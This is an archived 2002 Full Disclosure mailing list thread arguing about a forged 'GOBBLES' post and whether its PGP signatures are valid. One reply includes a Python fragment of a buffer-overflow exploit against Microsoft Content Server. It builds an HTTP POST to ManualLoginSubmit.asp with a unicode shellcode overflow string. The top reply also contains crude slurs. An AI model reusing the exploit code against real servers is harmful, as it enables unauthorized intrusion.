Full Disclosure mailing list archives
ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p
From: full-disclosure () lists netsys com (Anthony LaMantia)
Date: 13 Aug 2002 19:24:43 -0700
lol, well bugtraq is no diffrent the dallas proxy was hacked a month or so back and all of the e-mail address it pwds: to published lol besides dont you know this is the first front the anti-white-war started by gayh1tler.. there is a lot of shit going down.. this list isn't goona be the worst part -Anthony LaMantia www.bia-security.com On Wed, 2002-08-14 at 15:17, security-protocols () hushmail com wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Maybe noone has noticed this but, this person is sending as 'gobbles () hush com' and not the real 'gobbles () hushmail com'. See below: @hush.com email addresses 27/7/02 - Is yourname @hushmail.com already taken? Sign up now for a hush.com email address. - - -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 You supposed to be turkey friend turkey crew wanttobe yet you question show respect to turkey On 14 Aug 2002 17:06:11 -0400, full-disclosure () lists netsys com wrote:At least you got the key id correct that time. It's not a valid signature, but at least it produces one less error message. -dave ObExploit: #fragment of my exploit for MS Content Server #the full exploit can be found at https://immunitysec.com/members/ #but if you're not a member, this might save you some time writing your #exploit. #returns the sploitstring def makesploit(self): header="" body="" body+="NR_DOMAIN=WinNT%3A%2F%2F" #1 alignment byte so we are word aligned with the return addr attack="" attack+="A" attack+="\x41\xb9"*4000 #unicode shellcode!! attack=stroverwrite(attack,unicodeloop,1) print "length of overflow = "+str(len(attack)) attack=urllib.quote(attack) #print attack body+=attack body+="&NR_DOMAIN_LIST=WinNT%3A%2F%2FOAG4ZA0SR80BCRG&NR_USER=&NR_PASS WORD=&submit1=Continue&NEXTURL=%2FNR%2FSystem%2FAccess%2FDefaultGuest Login.asp" header+="POST /NR/System/Access/ManualLoginSubmit.asp HTTP/1.1\r\n" header+="Host: "+self.host+"\r\n" header+="User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; Bob)\r\n" header+="Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/pla in ;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q =0.1\r\n" header+="Connection: keep-alive\r\n" header+="Content-Type: application/x-www-form-urlencoded\r\n" header+="Content-Length: "+str(len(body))+"\r\n" header+="\r\n" return header+body #this stuff happens. if __name__ == '__main__': print "Running Microsoft Content Server exploit v 0.1" app = mscsexploit() if len(sys.argv) < 2: print "Usage: mycontent.py target [port] [ssl=0]" sys.exit() app.setHost(sys.argv[1]) if len(sys.argv) > 2: app.setPort(int(sys.argv[2])) if len(sys.argv) > 3: app.setSSL(1) app.run() On Wed, 2002-08-14 at 17:00, gobbles () hush com wrote:-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 or if you like On 14 Aug 2002 16:36:09 -0400, Dave Aitel <dave () immunitysec com> wrote:On Wed, 2002-08-14 at 17:04, Charles Stevenson wrote:Gobbles, On Wed, Aug 14, 2002 at 12:33:27PM -0700, gobbles () hush com wrote:GOBBLES just want to be cool whitehat like everyone else. Time fornewleaf time for six figure salary stock option naked breasted assistant.Word to that my man! ;) peace, coreYour message was signed, but the "GOBBLES" message was not and therefore just a forgery, most likely. BTW: http://www.immunitysec.com/vulnerabilities/ They arn't advisories, but if you need something to show to your boss about why you disconnected your Exchange/SQL server from the Internet, it's a good start. Dave Aitel Immunity, Inc-----BEGIN PGP SIGNATURE----- Version: Hush 2.1 Note: This signature can be verified at https://www.hushtools.com wlwEARECABwFAj1H8s4VHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPl8QA nA66Z1OWuMnTnOhLlFQLa0nOHSZtAJsFKJo5AOe/7/OYbXpZRd3grAD8MQ== =xfu0 -----END PGP SIGNATURE----- Communicate in total privacy. Get your free encrypted email at https://www.hushmail.com/?l=2 Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople- - -----BEGIN PGP SIGNATURE----- Version: Hush 2.1 Note: This signature can be verified at https://www.hushtools.com wlgEARECABgFAj1ayx0RHGdvYmJsZXNAaHVzaC5jb20ACgkQpmwDHEAx56uBwgCgrzaw 9J7jHuxLlnnPRAQi7pVgx/8An2SfUM0vQPa0Qb1kbwD1FouFtcWi =9eW6 - - -----END PGP SIGNATURE----- Communicate in total privacy. Get your free encrypted email at https://www.hushmail.com/?l=2 Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -----BEGIN PGP SIGNATURE----- Version: Hush 2.1 Note: This signature can be verified at https://www.hushtools.com wmcEARECACcFAj1a1V8gHHNlY3VyaXR5LXByb3RvY29sc0BodXNobWFpbC5jb20ACgkQ NAoGe68ymd16tACdGhj0H0rmHla8zAQMPX/Vh5Wya8QAn3FK7K4C1+h8RqTLjIBPKU3M d18c =gcJ+ -----END PGP SIGNATURE----- Communicate in total privacy. Get your free encrypted email at https://www.hushmail.com/?l=2 Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p full-disclosure () lists netsys com (Aug 14)
- ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p Anthony LaMantia (Aug 13)